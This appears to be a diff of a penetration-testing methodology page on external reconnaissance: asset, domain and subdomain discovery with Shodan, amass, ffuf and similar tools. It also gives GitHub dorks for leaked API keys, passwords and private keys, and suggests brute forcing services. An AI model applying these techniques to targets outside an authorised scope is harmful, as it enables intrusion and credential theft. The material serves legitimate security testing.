Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
### Other ways ## Other ways
**Note that you can use this technique to discover more domain names every time you find a new domain.** **Note that you can use this technique to discover more domain names every time you find a new domain.**
#### Shodan ### Shodan
As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate. As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"`
#### Google ### Google
Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages. Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages.
#### Assetfinder ### Assetfinder
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. [**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
### Looking for vulnerabilities ## Looking for vulnerabilities
Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company. Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**. If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ _Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Subdomains # Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. > We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
It's time to find all the possible subdomains of each found domain. It's time to find all the possible subdomains of each found domain.
### DNS ## DNS
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\). Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\).
@ -174,7 +172,7 @@ Let's try to get **subdomains** from the **DNS** records. We should also try for
dnsrecon -a -d tesla.com dnsrecon -a -d tesla.com
``` ```
### OSINT ## OSINT
The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html) The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
@ -192,13 +190,13 @@ assetfinder --subs-only <domain>
Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain. Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
#### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/) ### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/)
This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper). You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
#### RapidDNS ### RapidDNS
Quickly find subdomains using [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\): Quickly find subdomains using [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\):
@ -211,14 +209,14 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
} }
``` ```
#### Shodan ### Shodan
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following: You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
* http.html:”dev-int.bigcompanycdn.com” * http.html:”dev-int.bigcompanycdn.com”
* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”) * http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”)
### DNS Brute force ## DNS Brute force
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names. Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\). The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
@ -247,13 +245,13 @@ puredns bruteforce all.txt domain.com
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
### VHosts ## VHosts
#### IP VHosts ### IP VHosts
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter) You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
#### Brute Force ### Brute Force
If you suspect that some subdomain can be hidden in a web server you could try to brute force it: If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
@ -270,7 +268,7 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com
With this technique you may even be able to access internal/hidden endpoints. With this technique you may even be able to access internal/hidden endpoints.
{% endhint %} {% endhint %}
### CORS Brute Force ## CORS Brute Force
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**. Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
@ -278,20 +276,20 @@ Sometimes you will find pages that only return the header _**Access-Control-Allo
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
``` ```
### DNS Brute Force v2 ## DNS Brute Force v2
Once you have finished looking for subdomains you can use [**dnsgen** ](https://github.com/ProjectAnte/dnsgen)and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains. Once you have finished looking for subdomains you can use [**dnsgen** ](https://github.com/ProjectAnte/dnsgen)and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
### Buckets Brute Force ## Buckets Brute Force
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.** While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.**
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/). Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/).
### Monitorization ## Monitorization
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
### Looking for vulnerabilities ## Looking for vulnerabilities
Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover). Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/). If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/).
@ -299,7 +297,7 @@ If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**. If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ _Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Web servers hunting # Web servers hunting
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. > We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
@ -315,13 +313,13 @@ cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 an
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
``` ```
### Screenshots ## Screenshots
Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**. Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), \[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), \[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
## Recapitulation 1 # Recapitulation 1
> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\). > Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\).
> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that. > Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
@ -336,11 +334,11 @@ So you have already:
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.** Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.**
## **Bug hunting OSINT related information** # **Bug hunting OSINT related information**
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
### Api keys leaks in github ## Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) * [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) * [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
@ -354,7 +352,7 @@ Now that we have built the list of assets of our scope it's time to search for s
**Dorks**: _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._ **Dorks**: _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._
#### More Github Dorks ### More Github Dorks
* extension:pem private * extension:pem private
* extension:ppk private * extension:ppk private
@ -369,11 +367,11 @@ Now that we have built the list of assets of our scope it's time to search for s
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key) You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key)
## [**Pentesting Web Methodology**](pentesting/pentesting-web/) # [**Pentesting Web Methodology**](pentesting/pentesting-web/)
Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/). Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/).
## Recapitulation 2 # Recapitulation 2
> Congratulations! The testing has finished! I hope you have find some vulnerabilities. > Congratulations! The testing has finished! I hope you have find some vulnerabilities.

View file

@ -24,7 +24,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %} {% endhint %}
## Assets discoveries # Assets discoveries
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. > So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@ -35,7 +35,7 @@ The goal of this phase is to obtain all the **companies owned by the main compan
3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively) 3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively). 4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively).
### **Acquisitions** ## **Acquisitions**
First of all, we need to know which **other companies are owned by the main company**.\ First of all, we need to know which **other companies are owned by the main company**.\
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\ One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\
@ -43,7 +43,7 @@ Other option is to visit the **Wikipedia** page of the main company and search f
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. > Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
### **ASNs** ## **ASNs**
An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\ An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
@ -61,13 +61,13 @@ amass intel -asn 8911,50313,394161
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\ You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com). You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).
### **Looking for vulnerabilities** ## **Looking for vulnerabilities**
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\ At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\ Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). **Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
## Domains # Domains
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. > We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
@ -75,7 +75,7 @@ _Please, note that in the following purposed techniques you can also find subdom
First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
### **Reverse DNS** ## **Reverse DNS**
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8) As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8)
@ -89,7 +89,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
For this to work, the administrator has to enable manually the PTR.\ For this to work, the administrator has to enable manually the PTR.\
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com) You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)
### **Reverse Whois (loop)** ## **Reverse Whois (loop)**
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\ Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
You can use online tools like: You can use online tools like:
@ -107,7 +107,7 @@ You can also perform some automatic reverse whois discovery with [amass](https:/
**Note that you can use this technique to discover more domain names every time you find a new domain.** **Note that you can use this technique to discover more domain names every time you find a new domain.**
### **Trackers** ## **Trackers**
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\ If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
@ -119,7 +119,7 @@ There are some pages that let you search by these trackers and more:
* [**Publicwww**](https://publicwww.com) * [**Publicwww**](https://publicwww.com)
* [**SpyOnWeb**](http://spyonweb.com) * [**SpyOnWeb**](http://spyonweb.com)
### **Favicon** ## **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Heres how to use it: Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Heres how to use it:
@ -138,7 +138,7 @@ Moreover, you can also search technologies using the favicon hash as explained i
hodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}' hodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
``` ```
### **Other ways** ## **Other ways**
**Note that you can use this technique to discover more domain names every time you find a new domain.** **Note that you can use this technique to discover more domain names every time you find a new domain.**
@ -156,20 +156,20 @@ Go to the main page an find something that identifies the company, like the copy
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. [**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
### **Looking for vulnerabilities** ## **Looking for vulnerabilities**
Check for some [domain takeover](../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company. Check for some [domain takeover](../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ _Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Subdomains # Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. > We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
It's time to find all the possible subdomains of each found domain. It's time to find all the possible subdomains of each found domain.
### **DNS** ## **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it). Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
@ -177,7 +177,7 @@ Let's try to get **subdomains** from the **DNS** records. We should also try for
dnsrecon -a -d tesla.com dnsrecon -a -d tesla.com
``` ```
### **OSINT** ## **OSINT**
The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html) The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
@ -202,7 +202,7 @@ This project offers for **free all the subdomains related to bug-bounty programs
You could also find subdomains scrapping the web pages and parsing them (including JS files) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper). You could also find subdomains scrapping the web pages and parsing them (including JS files) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
### **RapidDNS** ## **RapidDNS**
Quickly find subdomains using [RapidDNS](https://rapiddns.io) API (from [link](https://twitter.com/Verry\_\_D/status/1282293265597779968)): Quickly find subdomains using [RapidDNS](https://rapiddns.io) API (from [link](https://twitter.com/Verry\_\_D/status/1282293265597779968)):
@ -215,7 +215,7 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
} }
``` ```
### **Shodan** ## **Shodan**
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following: You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
@ -226,7 +226,7 @@ It is possible to use Shodan from the official CLI to quickly analyze all IPs in
* https://book.hacktricks.xyz/external-recon-methodology * https://book.hacktricks.xyz/external-recon-methodology
### **DNS Brute force** ## **DNS Brute force**
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.\ Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.\
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors (you should always check for **false positives**) and the second one **is more reliable** (always use gobuster). The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors (you should always check for **false positives**) and the second one **is more reliable** (always use gobuster).
@ -255,7 +255,7 @@ puredns bruteforce all.txt domain.com
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning (DNS poisoning for example) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning (DNS poisoning for example) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
### **VHosts / Virtual Hosts** ## **VHosts / Virtual Hosts**
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter) You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
@ -279,7 +279,7 @@ VHostScan -t example.com
With this technique you may even be able to access internal/hidden endpoints. With this technique you may even be able to access internal/hidden endpoints.
{% endhint %} {% endhint %}
### **CORS Brute Force** ## **CORS Brute Force**
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**. Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
@ -287,20 +287,20 @@ Sometimes you will find pages that only return the header _**Access-Control-Allo
